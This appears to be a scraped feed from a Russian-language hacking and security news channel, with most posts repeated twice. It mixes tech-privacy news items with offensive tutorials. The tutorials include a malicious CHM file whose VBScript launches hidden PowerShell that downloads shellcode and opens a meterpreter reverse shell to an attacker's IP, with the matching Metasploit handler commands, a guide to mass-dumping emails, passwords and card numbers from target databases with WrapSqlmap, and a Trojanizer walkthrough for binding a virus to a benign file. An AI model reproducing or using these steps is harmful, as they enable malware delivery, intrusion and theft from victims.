На новые правила WhatsApp отреагировали целые страны
Недавно WhatsApp опубликовал информацию о новых условиях предоставления сервисов и политике обработки пользовательских данных, которые необходимо было принять до 8 февраля, однако из-за массового оттока пользователей принятие новых правил отложили до 15 мая.
На фоне этого Турция начала антимонопольное расследование по этому поводу, а Министерство технологий Индии направило Facebook письмо с просьбой отозвать новую политику конфиденциальности мессенждера WhatsApp. В Министерстве утверждают, что новые условия лишают индийских пользователей выбора. В письме говорится, что «предлагаемые изменения вызывают серьёзную озабоченность в отношении последствий для индийских граждан».
Ведомство заявляет, что у пользователей нет возможности отказаться от этих новых условий совместного использования данных с Facebook, а также что индийским пользователям предоставляется меньший выбор по сравнению с пользователями приложения на европейском рынке.
Министерство технологий Индии также попросило WhatsApp ответить на 14 вопросов, включая подробную информацию о категориях пользовательских данных, которые собирает WhatsApp, профилирует ли компания клиентов на основании использования и трансграничных потоков данных и так далее.
В заявлении WhatsApp говорится, что компания работает над устранением дезинформации и готова ответить на любые вопросы: «Мы хотим подчеркнуть, что это обновление не расширяет наши возможности по обмену данными с Facebook».
#новости
Недавно WhatsApp опубликовал информацию о новых условиях предоставления сервисов и политике обработки пользовательских данных, которые необходимо было принять до 8 февраля, однако из-за массового оттока пользователей принятие новых правил отложили до 15 мая.
На фоне этого Турция начала антимонопольное расследование по этому поводу, а Министерство технологий Индии направило Facebook письмо с просьбой отозвать новую политику конфиденциальности мессенждера WhatsApp. В Министерстве утверждают, что новые условия лишают индийских пользователей выбора. В письме говорится, что «предлагаемые изменения вызывают серьёзную озабоченность в отношении последствий для индийских граждан».
Ведомство заявляет, что у пользователей нет возможности отказаться от этих новых условий совместного использования данных с Facebook, а также что индийским пользователям предоставляется меньший выбор по сравнению с пользователями приложения на европейском рынке.
Министерство технологий Индии также попросило WhatsApp ответить на 14 вопросов, включая подробную информацию о категориях пользовательских данных, которые собирает WhatsApp, профилирует ли компания клиентов на основании использования и трансграничных потоков данных и так далее.
В заявлении WhatsApp говорится, что компания работает над устранением дезинформации и готова ответить на любые вопросы: «Мы хотим подчеркнуть, что это обновление не расширяет наши возможности по обмену данными с Facebook».
#новости
Временный номер в терминале
Если вы нуждаетесь в конфиденциальности и не хотите использовать личный номер в сторонних сервисах, то для вас существует полезный инструмент, которой называется «Tmpsms». Это утилита командной строки, написанная на POSIX, которая позволяет вам получать временные номера телефона и принимать на него SMS-сообщения.
Он использует временную SMS-службу Upmasked для получения сообщений. А так же, его легко можно интегрирован с другими скриптами для улучшения рабочего процесса.
Установка
Загрузите tmpsms файл и сделайте его исполняемым
Инициализировать новый номер телефона
#полезное
Если вы нуждаетесь в конфиденциальности и не хотите использовать личный номер в сторонних сервисах, то для вас существует полезный инструмент, которой называется «Tmpsms». Это утилита командной строки, написанная на POSIX, которая позволяет вам получать временные номера телефона и принимать на него SMS-сообщения.
Он использует временную SMS-службу Upmasked для получения сообщений. А так же, его легко можно интегрирован с другими скриптами для улучшения рабочего процесса.
Установка
Загрузите tmpsms файл и сделайте его исполняемым
$ curl -L " https://git.io/tmpsms " > tmpsms && chmod + x tmpsms
Затем переместите его куда-нибудь, например в $ PATH$ mv tmpsms ~ / bin /
ПрименениеИнициализировать новый номер телефона
$ tmpsms init
Просмотреть 5 последних сообщений$ tmpsms --count 5
📌https://github.com/sdushantha/tmpsms#полезное
В TikTok обнаружили уязвимость, которая позволяет собирать данные пользователей
В функции «Найти друзей» в TikTok обнаружена уязвимость, которая может позволить злоумышленникам собирать личные данные пользователей: номер телефона, ник, пользовательский ID и фотографии профиля, сообщили в компании Check Point. Также брешь дает доступ к некоторым настройкам профиля, в том числе возможности скрыть профиль и управлять подписками.
Эксплуатируя эту уязвимость, киберпреступники могли бы создать базу данных пользователей и их номеров телефонов и применять ее, например, в целевых фишинговых атаках, отметил глава Check Point Software Technologies по исследованию уязвимостей продуктов Одед Вануну. Он рекомендует пользователям TikTok указывать как можно меньше данных о себе и регулярно обновлять операционную систему и приложения до последней версии.
В Check Point отметили, что сообщили о найденной уязвимости разработчику приложения компании ByteDance, которая уже принимает меры для устранения бреши.
#новости
В функции «Найти друзей» в TikTok обнаружена уязвимость, которая может позволить злоумышленникам собирать личные данные пользователей: номер телефона, ник, пользовательский ID и фотографии профиля, сообщили в компании Check Point. Также брешь дает доступ к некоторым настройкам профиля, в том числе возможности скрыть профиль и управлять подписками.
Эксплуатируя эту уязвимость, киберпреступники могли бы создать базу данных пользователей и их номеров телефонов и применять ее, например, в целевых фишинговых атаках, отметил глава Check Point Software Technologies по исследованию уязвимостей продуктов Одед Вануну. Он рекомендует пользователям TikTok указывать как можно меньше данных о себе и регулярно обновлять операционную систему и приложения до последней версии.
В Check Point отметили, что сообщили о найденной уязвимости разработчику приложения компании ByteDance, которая уже принимает меры для устранения бреши.
#новости
Как зашифровать изображение в звук
Идея шифровки в звук изображения, с последующей возможностью просмотреть его в спектрограмме, набрала высокую популярность в последнее время на фоне различных интернет загадок, включая Cicada 3301.
Сгенерировать подобную аудиодорожку с зашифрованным изображением можно с помощью утилиты Spectrology.
Установка
Устанавливаем несколько пакетов Python
Для начала необходимо подготовить картинку в формате BMP. Сделать это можно с помощью Adobe Photoshop.
Далее прописываем следующую команду
Идея шифровки в звук изображения, с последующей возможностью просмотреть его в спектрограмме, набрала высокую популярность в последнее время на фоне различных интернет загадок, включая Cicada 3301.
Сгенерировать подобную аудиодорожку с зашифрованным изображением можно с помощью утилиты Spectrology.
Установка
Устанавливаем несколько пакетов Python
apt-get install git python-matplotlib python soxСкачиваем репозиторий с github
clone https://github.com/solusipse/spectrology.gitИспользование
Для начала необходимо подготовить картинку в формате BMP. Сделать это можно с помощью Adobe Photoshop.
Далее прописываем следующую команду
spectrology.py <путь к изображению> -b 10000 -t 18000На выходе получится WAV файл, который можно закинуть в Audacity, отобразить спектрограмму и просмотреть зашифрованное изображение.
Инструмент сбора информации о номерах телефона
«PhoneInfoga» — один из самых современных инструментов для сканирования международных телефонных номеров с использованием только бесплатных и отрытых ресурсов.
Он позволяет вам собрать стандартную информацию, например такую как страна, регион, оператор и тип линии, на любом международном телефонном номере, найти следы в поисковых системах, найти поставщика VoIP или идентифицировать владельца.
Помимо вышеперечисленного, данный сервис позволяет проверить отчеты о репутации, социальные сети и сервисы одноразовых номеров. А так же имеет возможность осуществлять запрос сразу по нескольким номерам.
📌https://github.com/sundowndev/PhoneInfoga
#OSINT
«PhoneInfoga» — один из самых современных инструментов для сканирования международных телефонных номеров с использованием только бесплатных и отрытых ресурсов.
Он позволяет вам собрать стандартную информацию, например такую как страна, регион, оператор и тип линии, на любом международном телефонном номере, найти следы в поисковых системах, найти поставщика VoIP или идентифицировать владельца.
Помимо вышеперечисленного, данный сервис позволяет проверить отчеты о репутации, социальные сети и сервисы одноразовых номеров. А так же имеет возможность осуществлять запрос сразу по нескольким номерам.
📌https://github.com/sundowndev/PhoneInfoga
#OSINT
Государственные приложения передают данные пользователей в США
Эксперты проверили приложения из магазина Google Play, созданные госорганами и госкомпаниями, например, «Госуслуги Москвы», «Активный гражданин» и «Парковки Москвы».
Оказалось, что в 39 приложениях из 44 есть минимум один встроенный трекер — сервис, который отслеживает данные и действия пользователей, а затем передает их сторонним компаниям. 86% трекеров принадлежат американским компаниям, например, Google, Facebook и Microsoft. А в приложении «Услуги РТ» (Республики Татарстан) нашли трекер японской компании.
В Минцифры отвечают: в системе электронного правительства все данные пользователей защищены, а трекеры нужны, к примеру, чтобы работали push-уведомления. В компании Infosecurity a Softline Company говорят, что иностранные спецслужбы могут получить доступ к программе, но если пользователь законопослушный, то бояться нечего.
#новости
Эксперты проверили приложения из магазина Google Play, созданные госорганами и госкомпаниями, например, «Госуслуги Москвы», «Активный гражданин» и «Парковки Москвы».
Оказалось, что в 39 приложениях из 44 есть минимум один встроенный трекер — сервис, который отслеживает данные и действия пользователей, а затем передает их сторонним компаниям. 86% трекеров принадлежат американским компаниям, например, Google, Facebook и Microsoft. А в приложении «Услуги РТ» (Республики Татарстан) нашли трекер японской компании.
В Минцифры отвечают: в системе электронного правительства все данные пользователей защищены, а трекеры нужны, к примеру, чтобы работали push-уведомления. В компании Infosecurity a Softline Company говорят, что иностранные спецслужбы могут получить доступ к программе, но если пользователь законопослушный, то бояться нечего.
#новости
Массовый взлом баз данных с помощью доработанного sqlmap
Утилита WrapSqlmap является доработанной версией sqlmap. В её функционал добавлена возможность сканирования и автоматического слива баз данных сразу нескольких целей, которые вносятся в один файл.
Установка и настройка
Скачиваем репозиторий с github
Скрипт написан на Python и в данный репозиторий уже включены все необходимые библиотеки.
Для начала открываем файл
В поле
Использование
Теперь остается только запустить программу указав, какие колонки из взломанных БД нужно сливать
Утилита WrapSqlmap является доработанной версией sqlmap. В её функционал добавлена возможность сканирования и автоматического слива баз данных сразу нескольких целей, которые вносятся в один файл.
Установка и настройка
Скачиваем репозиторий с github
Скрипт написан на Python и в данный репозиторий уже включены все необходимые библиотеки.
Для начала открываем файл
wrapper_config.py
через редактор.В поле
URLS_FILE
вписываем путь к файлу со ссылками на целевые сайты. Параметр DUMP
ставим в True
.Использование
Теперь остается только запустить программу указав, какие колонки из взломанных БД нужно сливать
python wrapper.py email, pass, card
#хакингMicrosoft обновит Windows 10 летом 2021 года
Американская корпорация Microsoft определилась со сроком релиза новой версии операционной системы Windows 10 21H1 — выпуск намечен на лето 2021 года.
Сроки релиза новой версии Windows 10 стали достоянием общественности благодаря официальной документации Microsoft, содержавшей соответствующую информацию. Ранее ожидалось, что новая версия выйдет в конце весны.
Утечка информации, впрочем, не противоречит прогнозам майского анонса обновления Windows 10. Предполагается, что новая версия операционной системы выйдет в виде пакета обновлений. Обновленные функции можно будет разблокировать при помощи специального ключа.
#новости
Американская корпорация Microsoft определилась со сроком релиза новой версии операционной системы Windows 10 21H1 — выпуск намечен на лето 2021 года.
Сроки релиза новой версии Windows 10 стали достоянием общественности благодаря официальной документации Microsoft, содержавшей соответствующую информацию. Ранее ожидалось, что новая версия выйдет в конце весны.
Утечка информации, впрочем, не противоречит прогнозам майского анонса обновления Windows 10. Предполагается, что новая версия операционной системы выйдет в виде пакета обновлений. Обновленные функции можно будет разблокировать при помощи специального ключа.
#новости
Склейка зловреда с безопасным файлом
Про склейку вируса с обычным файлом посредством SFX архива знают многие, однако вручную проводить этот процесс довольно неудобно. Нужно подготовить BAT файл, который правильно запустит остальные компоненты архива, настроить сам архив и т.д. Куда проще это делается с помощью программы Trojanizer.
Установка
Скачиваем репозиторий
При первом запуске Trojanizer установит необходимые зависимости. Если при этом процессе появятся ошибки и некоторые комплектующие не удастся установить, то это можно сделать вручную. Вот все необходимые вспомогательные программы: Wine Program Files, WinRAR Software и Zenity.
Использование
После установки зависимостей и непосредственного запуска программы откроется первое окно, в котором необходимо выбрать вирус.
Во второй форме, нужно соответственно выбрать программу, с которой будет производиться склейка.
После чего в соответствующих окнах вводим название SFX архива и выбираем иконку.
Готово. Последнее окно покажет путь до сгенерированного файла
#вирусы #хакинг
Про склейку вируса с обычным файлом посредством SFX архива знают многие, однако вручную проводить этот процесс довольно неудобно. Нужно подготовить BAT файл, который правильно запустит остальные компоненты архива, настроить сам архив и т.д. Куда проще это делается с помощью программы Trojanizer.
Установка
Скачиваем репозиторий
clone https://github.com/r00t-3xp10it/trojanizer.gitПереходим в созданную папку и запускаем утилиту
При первом запуске Trojanizer установит необходимые зависимости. Если при этом процессе появятся ошибки и некоторые комплектующие не удастся установить, то это можно сделать вручную. Вот все необходимые вспомогательные программы: Wine Program Files, WinRAR Software и Zenity.
Использование
После установки зависимостей и непосредственного запуска программы откроется первое окно, в котором необходимо выбрать вирус.
Во второй форме, нужно соответственно выбрать программу, с которой будет производиться склейка.
После чего в соответствующих окнах вводим название SFX архива и выбираем иконку.
Готово. Последнее окно покажет путь до сгенерированного файла
#вирусы #хакинг
SPARTA. Программа для пентеста с графическим интерфейсом
SPARTA это предустановленная в Kali Linux утилита для тестирования сетевой инфраструктуры на проникновение. В отличие от подобных фреймворков SPARTA имеет графический интерфейс, что значительно упрощает процесс пентеста новичкам. Рассмотрим её подробнее.
Установка
Как уже было сказано ранее, SPARTA предустановлена в Kali, однако в случае её отсутствия, утилиту можно установить командой
Использование
Открыть программу можно введя в терминале
Откроется окно, в левой панели которого можно добавить ip адрес, или их диапазон, для сканирования.
Сразу же после добавление начнется сначала сканирование nmap на открытые порты.
По мере сканирования при обнаружении портов 80 или 443 в процесс включится nikto, который произведет аудит развернутого на хосте вебприложения.
По мере завершения сканирования, в правой части окна программы вы увидите списком открытые порта каждого хоста с информацией об установленных на них сервисах.
Через SPARTA можно также запускать брутфорс роутеров, админ панелей камер видеонаблюдения и т.д.
SPARTA это предустановленная в Kali Linux утилита для тестирования сетевой инфраструктуры на проникновение. В отличие от подобных фреймворков SPARTA имеет графический интерфейс, что значительно упрощает процесс пентеста новичкам. Рассмотрим её подробнее.
Установка
Как уже было сказано ранее, SPARTA предустановлена в Kali, однако в случае её отсутствия, утилиту можно установить командой
clone https://github.com/secforce/sparta.gitПредварительно установив необходимые зависимости: Nmap, Hydra и CutyCapt.
Использование
Открыть программу можно введя в терминале
sparta
.Откроется окно, в левой панели которого можно добавить ip адрес, или их диапазон, для сканирования.
Сразу же после добавление начнется сначала сканирование nmap на открытые порты.
По мере сканирования при обнаружении портов 80 или 443 в процесс включится nikto, который произведет аудит развернутого на хосте вебприложения.
По мере завершения сканирования, в правой части окна программы вы увидите списком открытые порта каждого хоста с информацией об установленных на них сервисах.
Через SPARTA можно также запускать брутфорс роутеров, админ панелей камер видеонаблюдения и т.д.
Роскомнадзор опубликовал пирамиду цифровых угроз
Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) опубликовала в среду «пирамиду современных взаимосвязанных сетевых угроз, вызванных применением цифровых технологий на семи уровнях информационного пространства».
Семь уровней, по классификации Роскомнадзора, от основания пирамиды до вершины, это сетевое оборудование; маршрутизация; обработка данных; сервисы; вредоносная информация; общественно-опасная информация; фейки, цензура.
На каждом уровне, кроме верхнего, отдельно выделяются источники угроз и собственно угрозы.
Как поясняет ведомство, в основе пирамиды лежат угрозы сетям связи, интернет-маршрутизации и конфиденциальности данных. На вершине — контентные и смысловые угрозы, связанные общественным сознанием.
#новости
Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) опубликовала в среду «пирамиду современных взаимосвязанных сетевых угроз, вызванных применением цифровых технологий на семи уровнях информационного пространства».
Семь уровней, по классификации Роскомнадзора, от основания пирамиды до вершины, это сетевое оборудование; маршрутизация; обработка данных; сервисы; вредоносная информация; общественно-опасная информация; фейки, цензура.
На каждом уровне, кроме верхнего, отдельно выделяются источники угроз и собственно угрозы.
Как поясняет ведомство, в основе пирамиды лежат угрозы сетям связи, интернет-маршрутизации и конфиденциальности данных. На вершине — контентные и смысловые угрозы, связанные общественным сознанием.
#новости
Вирус в CHM файле
HTMLHelp (CHM) - это формат файлов Windows выпущенный в 1997 году, представляет из себя комплекс сжатых HTML страниц и используется для предоставления различной информации пользователям программ, к примеру.
В данные файлы можно интегрировать VBScript или JavaScript код, что открывает возможность для создания вредоносного CHM файла, путем добавления в разметку кодового блока с пейлоадом, чем мы сегодня и займемся.
Создание вредоносного файла
Для начала скачаем компилятор htm2chm. С помощью него мы сможем создавать CHM файлы из обычных HTML страниц.
Далее создаем .html файл, со следующим кодом
Проведение атаки
Перед запуском зараженного файла на ПК жертвы необходимо подготовить meterpreter.
Прописываем в терминале Kali Linux ряд команд поочередно
#хакинг #вирусы
HTMLHelp (CHM) - это формат файлов Windows выпущенный в 1997 году, представляет из себя комплекс сжатых HTML страниц и используется для предоставления различной информации пользователям программ, к примеру.
В данные файлы можно интегрировать VBScript или JavaScript код, что открывает возможность для создания вредоносного CHM файла, путем добавления в разметку кодового блока с пейлоадом, чем мы сегодня и займемся.
Создание вредоносного файла
Для начала скачаем компилятор htm2chm. С помощью него мы сможем создавать CHM файлы из обычных HTML страниц.
Далее создаем .html файл, со следующим кодом
Подставляем нужные значения ip адреса и порта, после чего компилируем файл. Открываем htm2chm, нажимаем "Compiler", в поле Folder выбираем папку с созданным файлом, жмем "Start".
<body>
<script language="VBScript">
Set cmd = CreateObject("wscript.shell")
cmd.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost <ip адрес> -lport <порт> -force"
</script>
</body>
</html>
Проведение атаки
Перед запуском зараженного файла на ПК жертвы необходимо подготовить meterpreter.
Прописываем в терминале Kali Linux ряд команд поочередно
-qПодставляем нужные значения, и как только на целевом ПК откроется вредоносный файл, в терминал моментально прилетит открытая сессия.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST <ip адрес>
set LPORT <порт>
#хакинг #вирусы
Приложение МВД может получить доступ к контактам пользователей
МВД объявило тендер на доработку мобильного приложения 4 февраля — победитель будет объявлен 1 марта. Он должен интегрировать модуль «Антимошенник» для распознавания звонков с мошеннических номеров.
Как следует из тендерной документации, с которой ознакомился «Коммерсант», приложению потребуется доступ к телефонной книге пользователя. Модуль будет соединяться с информационной системой полиции через сторонний сервис. При звонке с неизвестного номера приложение будет сопоставлять его со списком мошеннических номеров правоохранителей и предупредит в случае совпадения.
Инициатива МВД уменьшит объем телефонного мошенничества, признает директор центра Solar appScreener компании «Ростелеком-Солар» Даниил Чернов. Но эксперт недоумевает, зачем приложению, обрабатывающему только входящие вызовы, доступ ко всем контактам телефона. В этом случае оно может работать как скандальный сервис Get Contact, обещавший пользователю показать, как он записан в телефонных книгах разных людей, но в реальности собиравший базу номеров.
Инициатива также несет риски злоупотреблений и утечки данных, поскольку их обработка будет происходить на сторонних серверах, уточняет глава отдела информационной безопасности «СерчИнформ» Алексей Дрозд.
#новости
МВД объявило тендер на доработку мобильного приложения 4 февраля — победитель будет объявлен 1 марта. Он должен интегрировать модуль «Антимошенник» для распознавания звонков с мошеннических номеров.
Как следует из тендерной документации, с которой ознакомился «Коммерсант», приложению потребуется доступ к телефонной книге пользователя. Модуль будет соединяться с информационной системой полиции через сторонний сервис. При звонке с неизвестного номера приложение будет сопоставлять его со списком мошеннических номеров правоохранителей и предупредит в случае совпадения.
Инициатива МВД уменьшит объем телефонного мошенничества, признает директор центра Solar appScreener компании «Ростелеком-Солар» Даниил Чернов. Но эксперт недоумевает, зачем приложению, обрабатывающему только входящие вызовы, доступ ко всем контактам телефона. В этом случае оно может работать как скандальный сервис Get Contact, обещавший пользователю показать, как он записан в телефонных книгах разных людей, но в реальности собиравший базу номеров.
Инициатива также несет риски злоупотреблений и утечки данных, поскольку их обработка будет происходить на сторонних серверах, уточняет глава отдела информационной безопасности «СерчИнформ» Алексей Дрозд.
#новости
Подборка ресурсов для проверки уровня личной приватности и безопасности в сети
Проверки приватности и безопасности в сети нужно делать регулярно. Для вашего удобства мы сделали подборку с самыми полезными ресурсами из этой сферы.
▫️ Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт:
http://checkshorturl.com
https://unshorten.me/
http://www.untinyurl.com
▫️ Проверка анонимности web-серфинга:
https://proxy6.net/privacy
http://proiptest.com/test/
▫️Проверка твоего Web browser на безопасность (security bugs, malware addons, etc):
https://browsercheck.qualys.com/
https://www.comss.ru/page.php?id=1408
▫️ Экспресс-онлайн проверка безопасности вашего десктопа от фишинга, уязвимостей ПО, утечки sensitive data и т.д.
http://www.cpcheckme.com/checkme/
▫️ Проверка хостовой IDS\IPS и end-point Firewall:
http://www.hackerwatch.org/probe/
http://www.t1shopper.com/tools/port-scan/
▫️ Онлайн-антивирусы:
https://www.virustotal.com/ru/
https://online.drweb.com/
▫️ Онлайн-песочницы:
https://threatpoint.checkpoint.com/ThreatPortal/emulation
https://www.vicheck.ca
#полезное
Проверки приватности и безопасности в сети нужно делать регулярно. Для вашего удобства мы сделали подборку с самыми полезными ресурсами из этой сферы.
▫️ Дешифроторы коротких URL-ссылок для проверки на фишинговый сайт:
http://checkshorturl.com
https://unshorten.me/
http://www.untinyurl.com
▫️ Проверка анонимности web-серфинга:
https://proxy6.net/privacy
http://proiptest.com/test/
▫️Проверка твоего Web browser на безопасность (security bugs, malware addons, etc):
https://browsercheck.qualys.com/
https://www.comss.ru/page.php?id=1408
▫️ Экспресс-онлайн проверка безопасности вашего десктопа от фишинга, уязвимостей ПО, утечки sensitive data и т.д.
http://www.cpcheckme.com/checkme/
▫️ Проверка хостовой IDS\IPS и end-point Firewall:
http://www.hackerwatch.org/probe/
http://www.t1shopper.com/tools/port-scan/
▫️ Онлайн-антивирусы:
https://www.virustotal.com/ru/
https://online.drweb.com/
▫️ Онлайн-песочницы:
https://threatpoint.checkpoint.com/ThreatPortal/emulation
https://www.vicheck.ca
#полезное
В Google Chrome заблокировали очень популярное расширение The Great Suspender
Google заблокировала популярное расширение The Great Suspender для браузера Chrome и удалила его из интернет-магазина Chrome. Это расширение позволяло выключать неиспользуемые вкладки, чтобы оптимизировать работу браузера.
Пользователи The Great Suspender получили оповещение о том, что расширение содержало вредоносное ПО. Сообщается, что расширение в конце 2020 года продали неизвестной компании, а она добавила в него эксплойт. Он позволял выполнять код без ведома пользователя. Данное расширение, кстати, уже удалили и из Microsoft Edge.
The Great Suspender довольно быстро стало популярным, поскольку браузер Chrome потребляет много ресурсов, а расширение позволяло заменять неактивные вкладки пустым серым экраном, экономя ресурсы. Сообщается, что после блокировки многие пользователи потеряли неиспользуемые вкладки, которые были им нужны.
#новости
Google заблокировала популярное расширение The Great Suspender для браузера Chrome и удалила его из интернет-магазина Chrome. Это расширение позволяло выключать неиспользуемые вкладки, чтобы оптимизировать работу браузера.
Пользователи The Great Suspender получили оповещение о том, что расширение содержало вредоносное ПО. Сообщается, что расширение в конце 2020 года продали неизвестной компании, а она добавила в него эксплойт. Он позволял выполнять код без ведома пользователя. Данное расширение, кстати, уже удалили и из Microsoft Edge.
The Great Suspender довольно быстро стало популярным, поскольку браузер Chrome потребляет много ресурсов, а расширение позволяло заменять неактивные вкладки пустым серым экраном, экономя ресурсы. Сообщается, что после блокировки многие пользователи потеряли неиспользуемые вкладки, которые были им нужны.
#новости
Как безопасно открыть подозрительный софт в Windows?
Случалось ли Вам оказаться в ситуации, когда необходимо запустить какую-то программу, но Вы не совсем уверены в источнике её происхождения? А вдруг это вредонос? Или другой пример — необходимость проверить что-то на «чистой» версии Windows. Во всех подобных случаях раньше был только один выход — установить ОС на отдельную физическую или виртуальную машину и провести нужный эксперимент.
Думаю, не у всех вызывает восторг постоянно запариваться с дедиками и виртуалками. Мало кто знает, что Microsoft разработала собственную песочницу для Windows 10, которая позволяет запускать приложения в безопасном изолированном окружении.
▫️ Запустите Панель управления.
▫️Откройте раздел "Программы и компоненты".
▫️Нажмите на пункт "включение и выключение компонентов Windows".
▫️ Выберите "Песочница Windows" и нажмите "ок".
▫️ Перезагрузите ПК, в меню должно появиться приложение "Windows sandbox".
▫️Для проверки программы скопируйте файл из основной системы в песочницу.
▫️ Установите и запустите приложение в песочнице.
Даже при наличии вирусов, они не смогут проникнуть в основную систему и не нанесут значимый вред. Но учтите, что при закрытии песочницы файл сотрется!
#интересноеиполезное
Случалось ли Вам оказаться в ситуации, когда необходимо запустить какую-то программу, но Вы не совсем уверены в источнике её происхождения? А вдруг это вредонос? Или другой пример — необходимость проверить что-то на «чистой» версии Windows. Во всех подобных случаях раньше был только один выход — установить ОС на отдельную физическую или виртуальную машину и провести нужный эксперимент.
Думаю, не у всех вызывает восторг постоянно запариваться с дедиками и виртуалками. Мало кто знает, что Microsoft разработала собственную песочницу для Windows 10, которая позволяет запускать приложения в безопасном изолированном окружении.
▫️ Запустите Панель управления.
▫️Откройте раздел "Программы и компоненты".
▫️Нажмите на пункт "включение и выключение компонентов Windows".
▫️ Выберите "Песочница Windows" и нажмите "ок".
▫️ Перезагрузите ПК, в меню должно появиться приложение "Windows sandbox".
▫️Для проверки программы скопируйте файл из основной системы в песочницу.
▫️ Установите и запустите приложение в песочнице.
Даже при наличии вирусов, они не смогут проникнуть в основную систему и не нанесут значимый вред. Но учтите, что при закрытии песочницы файл сотрется!
#интересноеиполезное
Роскомнадзор выпустил приложение для жалоб на «запрещенную информацию»
Роскомнадзор начал бета-тестирование мобильного приложения, созданного для «ускоренной подачи жалоб граждан на запрещенную информацию». Об этом сообщается в телеграм-канале ведомства.
«Цель приложения РКН — повысить оперативность удаления из Сети запрещенной информации. Помимо подачи жалобы на зловредный контент сервис позволяет отследить этапы ее рассмотрения, проверить, ограничен ли доступ к интернет-ресурсам, в том числе сокращает риски блокировки за неудаление материалов», — сказано в сообщении.
Для того, чтобы оставить жалобу, пользователям будет необходимо зайти через свой аккаунт на сайте «Госуслуги».
Телеграм-канал «ЗаТелеком» сообщает, что вскоре после публикации релиза приложение перестало работать. У корреспондента «Медиазоны» на момент публикации новости проблем с работой приложения не было.
#новости
Роскомнадзор начал бета-тестирование мобильного приложения, созданного для «ускоренной подачи жалоб граждан на запрещенную информацию». Об этом сообщается в телеграм-канале ведомства.
«Цель приложения РКН — повысить оперативность удаления из Сети запрещенной информации. Помимо подачи жалобы на зловредный контент сервис позволяет отследить этапы ее рассмотрения, проверить, ограничен ли доступ к интернет-ресурсам, в том числе сокращает риски блокировки за неудаление материалов», — сказано в сообщении.
Для того, чтобы оставить жалобу, пользователям будет необходимо зайти через свой аккаунт на сайте «Госуслуги».
Телеграм-канал «ЗаТелеком» сообщает, что вскоре после публикации релиза приложение перестало работать. У корреспондента «Медиазоны» на момент публикации новости проблем с работой приложения не было.
#новости
Как создать QR-код с логотипом?
Принято считать, что QR-код используют большие компании и бренды, но это не так. Любой человек может создать персонализированный QR-код — это легко и быстро, кроме того не потребует больших вложений.
▫️QR Code Monkey— популярный бесплатный генератор QR-кода. Для его создания вам достаточно сделать несколько простых шагов
▫️Unitag — это еще одна программа создания QR-кода, которая предоставляет возможность создавать, управлять и отслеживать коды с пользовательскими цветами и логотипами.
▫️Qrcode-pro — этот генератор также предлагает широкую цветовую палитру для кода и возможность добавления логотипа. Механизм создания похож на другие сервисы из подборки, но функционал немного урезан.
#полезное
Принято считать, что QR-код используют большие компании и бренды, но это не так. Любой человек может создать персонализированный QR-код — это легко и быстро, кроме того не потребует больших вложений.
▫️QR Code Monkey— популярный бесплатный генератор QR-кода. Для его создания вам достаточно сделать несколько простых шагов
▫️Unitag — это еще одна программа создания QR-кода, которая предоставляет возможность создавать, управлять и отслеживать коды с пользовательскими цветами и логотипами.
▫️Qrcode-pro — этот генератор также предлагает широкую цветовую палитру для кода и возможность добавления логотипа. Механизм создания похож на другие сервисы из подборки, но функционал немного урезан.
#полезное
Арестована хак-группа, промышлявшая подменой SIM и «заработавшая» на этом миллионы
Британское Национальное агентство по борьбе с преступностью сообщило, что в начале текущей недели правоохранительные органы Англии и Шотландии арестовали восемь человек, которые занимались подменой SIM-карт и похищали деньги у американских знаменитостей и богатых людей. Часто атаки группы затрагивали известных спортсменов, музыкантов и так далее.
Представители Европола добавляют, что эти аресты стали продолжением крупной операции, начавшейся на Мальте и Бельгии, где ранее были задержаны другие члены этой же преступной группы. Данное расследование началось еще в прошлом году, после масштабного взлома Twitter, и в нем принимали участие власти США, Великобритании, Канады, Мальты и Бельгии.
По данным властей, преступники действовали по классической схеме и обманом вынуждали сотрудников американских операторов сотовой связи присвоить их SIM-карте телефонный номер знаменитости. Имея доступ к номеру жертвы, мошенники сбрасывали пароли и обходили двухфакторную аутентификацию в различных учетных записях. Суммарно такая активность принесла группировке более 100 000 000 долларов США в криптовалюте.
#новости
Британское Национальное агентство по борьбе с преступностью сообщило, что в начале текущей недели правоохранительные органы Англии и Шотландии арестовали восемь человек, которые занимались подменой SIM-карт и похищали деньги у американских знаменитостей и богатых людей. Часто атаки группы затрагивали известных спортсменов, музыкантов и так далее.
Представители Европола добавляют, что эти аресты стали продолжением крупной операции, начавшейся на Мальте и Бельгии, где ранее были задержаны другие члены этой же преступной группы. Данное расследование началось еще в прошлом году, после масштабного взлома Twitter, и в нем принимали участие власти США, Великобритании, Канады, Мальты и Бельгии.
По данным властей, преступники действовали по классической схеме и обманом вынуждали сотрудников американских операторов сотовой связи присвоить их SIM-карте телефонный номер знаменитости. Имея доступ к номеру жертвы, мошенники сбрасывали пароли и обходили двухфакторную аутентификацию в различных учетных записях. Суммарно такая активность принесла группировке более 100 000 000 долларов США в криптовалюте.
#новости
Telegram сохранял самоуничтожающиеся медиафайлы в секретных чатах
В популярном приложении для обмена сообщениями Telegram была обнаружена уязвимость в версии программы для macOS, нарушающая конфиденциальность пользователей.
Проблема была выявлена исследователем безопасности Дхираджем Мишрой в версии приложения Telegram 7.3. Ее эксплуатация позволяла получать доступ к самоуничтожающимся аудио- и видеосообщениям спустя долгое время после их исчезновения из секретных чатов.
В отличие от Signal или WhatsApp, беседы в Telegram по умолчанию не зашифрованы, за исключением случаев, когда пользователи используют секретные чаты, сохраняющая данные в зашифрованном виде даже на серверах Telegram.
#новости
В популярном приложении для обмена сообщениями Telegram была обнаружена уязвимость в версии программы для macOS, нарушающая конфиденциальность пользователей.
Проблема была выявлена исследователем безопасности Дхираджем Мишрой в версии приложения Telegram 7.3. Ее эксплуатация позволяла получать доступ к самоуничтожающимся аудио- и видеосообщениям спустя долгое время после их исчезновения из секретных чатов.
В отличие от Signal или WhatsApp, беседы в Telegram по умолчанию не зашифрованы, за исключением случаев, когда пользователи используют секретные чаты, сохраняющая данные в зашифрованном виде даже на серверах Telegram.
#новости